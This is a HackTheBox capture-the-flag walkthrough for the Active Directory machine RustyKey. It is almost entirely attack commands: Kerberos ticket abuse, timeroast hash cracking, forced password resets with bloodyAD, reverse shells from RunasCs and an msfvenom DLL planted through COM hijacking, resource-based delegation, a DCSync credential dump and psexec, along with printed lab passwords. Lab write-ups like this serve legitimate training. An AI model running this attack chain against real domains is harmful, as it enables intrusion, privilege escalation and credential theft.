HackTheBox RustyKey Walkthrough

stillemptystillempty
4 min read

Table of contents

This machine is running some cleanup script ,which makes solving it a hell , as for now in machine initially we were given access to user account rr.parker and his pass 8#t5HE8L!W3A

Initial Recon

the nmap scan reveal nothing unusual just dc names and host name

but while using netexec i saw that ntlm authentication was disabled but kerberos was working

but then i tried rid brute force using getting tgt of rr.parker

impacket-getTGT 'RUSTYKEY.HTB/rr.parker':'8#t5HE8L!W3A'
export KRB5CCNAME=rr.parker.ccache
nxc smb dc.rustykey.htb -k --rid-brute

by seeing so many computer , i though of doing timeroast , to know more about timeroast read this

nxc smb 10.10.11.75 -M timeroast

we will use hascat to crack these store hashes without rid like this $sntp-ms$a0401fc1d9f28b37ffb58e5f78a375fb$1c0111e900000000000a27e14c4f434cec0d0cbe0e792b65e1b8428bffbfcd0aec0d41515a8135f5ec0d41515a816d52 and use hascat beta https://hashcat.net/beta/ and use this cmd to crack it

./hashcat.bin -m 31300 timeroast_hashes.txt /usr/share/wordlists/rockyou.txt

and finally got pass this hash refers to rid 1125 $sntp-ms$a0401fc1d9f28b37ffb58e5f78a375fb$1c0111e900000000000a27e14c4f434cec0d0cbe0e792b65e1b8428bffbfcd0aec0d41515a8135f5ec0d41515a816d52:Rusty88! which is IT-COMPUTER3$ , now enumrating this account in bloodhound

so IT-COMPUTER3$ has self add right on HELPDESK more over HELPDESK has force change password right on these account and on protected objects

Initial FootHold and user.txt

so after enumerating all account the only account i can access is BB.MORGAN using evil winrm and but first add computer3 to help desk change pass of BB.MORGAN and remove him from protected objects

bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password BB.MORGAN 'Password123@'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'IT'

then add this

sudo nano /etc/krb5.conf

[libdefaults]
    default_realm = RUSTYKEY.HTB

# The following krb5.conf variables are only for MIT Kerberos.
    kdc_timesync = 1
    ccache_type = 4
    forwardable = true
    proxiable = true
        rdns = false


# The following libdefaults parameters are only for Heimdal Kerberos.
    fcc-mit-ticketflags = true

[realms]
    RUSTYKEY.HTB = {
        kdc = 10.10.11.75
        admin_server = 10.10.11.75
    }

after this to this

impacket-getTGT 'RUSTYKEY.HTB/BB.MORGAN':'Password123@'
export KRB5CCNAME=BB.MORGAN.ccache
evil-winrm -i dc.rustykey.htb -r rustykey.htb

and BOOM !! you have access to BB.MORGAN computer

for now we got user.txt lets move to root

Privelege Escalation and root.txt

read the internal.pdf got from bb morgan desktop

here note 3 things

  • extraction/compression issues —> 7-zip ( can see in program files)

  • registry changes are allowed for Support team

  • Support Group - ee.reed is in the group

so now lets move to ee.reed account to do dll injection to gain access of mm.turner ,we will upload RunasCs.exe using evil-winrm and again add compter 3 to HELPDESK and force change pass of ee.reed and remove the account from support as the cleanup script cleans everything

bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password EE.REED 'Password123@'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'

in bb.morgan evil-winrm session run

nc -lnvp 4444 (on other shell)
.\RunasCs.exe EE.REED 'Password123@' powershell.exe -r <YOUR_IP>:4444

on other hand you will get a shell from ee.reed

run this on your ip machine for dll injection

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=1234 -f dll -o rev.dll

then upload this rev.dll using bb.morgan evil-winrm , and make sure to run and upload all scripts in a folder tmp ( make it using mkdir ‘c:\tmp ‘) then in ee.reed shell we see where we can do dll injection

for dll injection do this

nc -lnvp 1234 (on other shell)
$clsid = 'HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}'
Set-ItemProperty "$clsid\InprocServer32" '(default)' 'C:\tmp\rev.dll'
reg add "HKLM\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\tmp\rev.dll" /f

now you will get a shell of mm.turner

then type powershell upload PowerView.ps1 script in the same directory (c:\tmp) using the shell of bb.morgan and import it using . .\PowerView.ps1

$ComputerSID = New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-3316070415-896458127-4139322052-1125")

$SD = New-Object System.DirectoryServices.ActiveDirectorySecurity

$SD.SetOwner($ComputerSID)

$SD.SetGroup($ComputerSID)

$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($ComputerSID, "GenericAll", "Allow")

$SD.AddAccessRule($ACE)

$BinarySD = $SD.GetSecurityDescriptorBinaryForm()

Set-ADComputer -Identity "DC" -Replace @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $BinarySD}

(TO CHECK IF EVERYTHING IS OK)
Get-ADComputer DC -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

so we are doing Resource-Based Constrained Delegation (RBCD) to the Domain Controller and why are we using this to impersonate users to access services on it.

make sure you see this

now there are two way to get root

Root 1 (DCSync attack)

impacket-getTGT 'RUSTYKEY.HTB/IT-COMPUTER3$':'Rusty88!'
export KRB5CCNAME=IT-COMPUTER3$.ccache
impacket-getST  -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.11.75 -k 'RUSTYKEY.HTB/IT-COMPUTER3$:Rusty88!'
export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache
impacket-secretsdump -k -no-pass rustykey.htb/backupadmin@dc.rustykey.htb

then do

impacket-getTGT 'RUSTYKEY.HTB/administrator':'Rustyrc4key#!'
export KRB5CCNAME=administrator.ccache
evil-winrm -i dc.rustykey.htb -r rustykey.htb

Root 2 (psexec)

impacket-getTGT 'RUSTYKEY.HTB/IT-COMPUTER3$':'Rusty88!'
export KRB5CCNAME=IT-COMPUTER3$.ccache
impacket-getST  -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.11.75 -k 'RUSTYKEY.HTB/IT-COMPUTER3$:Rusty88!'
export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache

then use psexec , to get administrator shell

impacket-psexec -k -no-pass rustykey.htb/backupadmin@dc.rustykey.htb

and both the way we get root.txt more over if you face any authenctication issues try repeating the bloodyAD step or step where you are having issues as cleanup script , cleans everytime

To know more about COM Hijacking read this

Thanks for reading the walkthrough. Hope you like it ! Do leave a comment for feedback or queries !!

0
Subscribe to my newsletter

Read articles from stillempty directly inside your inbox. Subscribe to the newsletter, and don't miss out.

rustykey#HackTheBoxActive Directoryred team#walkthrough

Written by

stillempty
stillempty